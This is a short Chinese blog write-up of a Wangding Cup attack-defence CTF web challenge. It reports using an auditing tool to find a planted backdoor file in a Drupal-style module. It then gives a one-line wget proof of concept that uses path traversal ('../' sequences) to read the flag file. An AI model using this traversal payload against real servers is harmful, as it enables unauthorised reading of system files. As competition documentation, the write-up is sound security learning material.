网鼎杯线下AWD【WEB】
不得不说AWD对WEB狗越来越不友好了
Down下网站源码后上Seay源代码审计工具
直接自动审计一波
发现预留后门
路径/sites/all/modules/avatar_uploader/lib/demo/view.php
|
直接构造POC:wget http://ip:5072/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../flag
即可获取目标机上flag
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Sp4ce's Blog!
评论